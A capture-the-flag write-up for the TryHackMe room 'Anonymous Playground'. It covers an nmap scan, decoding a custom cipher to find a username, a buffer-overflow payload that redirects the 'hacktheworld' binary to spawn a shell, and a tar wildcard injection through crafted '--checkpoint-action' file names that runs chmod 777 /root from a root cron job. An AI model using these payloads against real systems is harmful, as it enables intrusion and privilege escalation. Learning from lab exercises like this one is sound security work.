Anonymous Playground: THM writeup

Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 60:b6:ad:4c:3e:f9:d2:ec:8b:cd:3b:45:a5:ac:5f:83 (RSA)
| 256 6f:9a:be:df:fc:95:a2:31:8f:db:e5:a2:da:8a:0c:3c (ECDSA)
|_ 256 e6:98:52:49:cf:f2:b8:65:d7:41:1c:83:2e:94:24:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/zYdHuAKjP
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proving Grounds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HomePage
Operatives.php
hE = m
zA = a
dC = g
fH = n
zA = a
The cipher looks like:

final = ord(second_character) - 64 + ord(first_character)
# If the character lies above "z" in the ASCII table, wrap around
if final > ord("z"):
    final = (final % ord("z")) + ord("a") - 1
chr(final)
  • First, convert the ASCII code of the second character to its alphabetic number,
    i.e. 'A': 1,
    'B': 2, ...
  • Add this to the ASCII code of the first character and take the resulting character.
  • If the result is higher than the ASCII value of 'z', wrap around: the excess is added to the ASCII value of 'a' (minus one).
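An added example, not from the original writeup: the cipher above as Python, run over the page's pairs, plus a brute-force inverse (a generalisation beyond what the page shows) that lists every two-character pair decoding to a given letter.

```python
# Added example (not the writeup's own code): the Operatives.php cipher
# exactly as the page describes it, with the wrap-around rule.
import string


def decode_pair(pair: str) -> str:
    """Map one pair such as 'hE' to a single lowercase letter."""
    first, second = pair[0], pair[1]
    if first not in string.ascii_lowercase or second not in string.ascii_uppercase:
        raise ValueError(f"expected lowercase+uppercase pair, got {pair!r}")
    # 'A' -> 1, 'B' -> 2, ... then add that to the ASCII code of the first character
    final = ord(second) - 64 + ord(first)
    # Past 'z': wrap back round to the start of the alphabet
    if final > ord("z"):
        final = (final % ord("z")) + ord("a") - 1
    return chr(final)


def decode(ciphertext: str) -> str:
    """Decode a whole string; pairs may be space-separated or run together."""
    compact = ciphertext.replace(" ", "")
    if len(compact) % 2:
        raise ValueError("ciphertext must consist of whole pairs")
    return "".join(decode_pair(compact[i:i + 2]) for i in range(0, len(compact), 2))


def encodings_of(letter: str) -> list[str]:
    """Every pair that decodes to `letter` (the mapping is many-to-one)."""
    return [a + b for a in string.ascii_lowercase for b in string.ascii_uppercase
            if decode_pair(a + b) == letter]


if __name__ == "__main__":
    # Constructed input: the five pairs listed on the page, in order
    print(decode("hE zA dC fH zA"))  # magna
```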
magna :: <Password>

Inside the system

main function decompiled using Ghidra.
call_bash function decompiled using Ghidra.

Buffer overflow

$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld
$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" > ro
# Store the exploit in a file
$ gdb ./hacktheworld # run gdb
(gdb) break call_bash # set breakpoint call_bash function
(gdb) run < ro # run the program with the input from ro
Starting program: /home/magna/hacktheworld < ro
Breakpoint 1, 0x000000000040065b in call_bash ()
(gdb) c
Continuing.
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
Breakpoint 2, 0x00000000004006d0 in call_bash ()
# we are hitting the second breakpoint
(gdb) s
Single stepping until exit from function call_bash,
which has no line number information.
__libc_system (line=0x400803 "/bin/sh") at ../sysdeps/posix/system.c:180
180 ../sysdeps/posix/system.c: No such file or directory.
(gdb)
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
*/1 *   * * *   root    cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
$ echo "ro" > "--checkpoint=1"
$ echo "ro" > "--checkpoint-action=exec=sh ro.sh"
$ echo "chmod 777 /root" > ro.sh

Roshan Guragain
Infosec Enthusiast